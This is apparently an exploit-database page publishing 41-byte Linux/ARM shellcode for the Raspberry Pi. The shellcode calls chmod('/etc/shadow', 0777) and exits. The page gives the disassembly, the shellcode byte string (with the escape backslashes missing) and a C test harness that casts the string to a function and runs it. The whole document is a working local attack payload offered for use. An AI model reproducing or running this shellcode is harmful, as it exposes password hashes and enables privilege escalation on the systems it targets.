[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : [Raspberry Pi] Linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes
# Published : 2012-09-11
# Author :
# Previous Title : Linux/ARM - add root user with password - 151 bytes
# Next Title : Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM)
/*
Title: Linux/ARM - chmod("/etc/shadow", 0777) - 41 bytes
Date: 2012-09-08
Tested on: ARM1176JZF-S (v6l)
Author: midnitesnake
00008054 <_start>:
8054: e28f6001 add r6, pc, #1
8058: e12fff16 bx r6
805c: 4678 mov r0, pc
805e: 3012 adds r0, #18
8060: 21ff movs r1, #255 ; 0xff
8062: 31ff adds r1, #255 ; 0xff
8064: 3101 adds r1, #1
8066: 270f movs r7, #15
8068: df01 svc 1
806a: 1b24 subs r4, r4, r4
806c: 1c20 adds r0, r4, #0
806e: 2701 movs r7, #1
8070: df01 svc 1
8072: 652f .short 0x652f
8074: 732f6374 .word 0x732f6374
8078: 6f646168 .word 0x6f646168
807c: 46c00077 .word 0x46c00077
*/
#include <stdio.h>
char shellcode[] = "x01x60x8fxe2"
"x16xffx2fxe1"
"x78x46"
"x12x30"
"xffx21"
"xffx31"
"x01x31"
"x0fx27"
"x01xdf"
"x24x1b"
"x20x1c"
"x01x27"
"x01xdf"
"x2fx65"
"x74x63x2fx73"
"x68x61x64x6f"
"x77x00"
"xc0x46";
int main()
{
fprintf(stdout,"Length: %dn",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}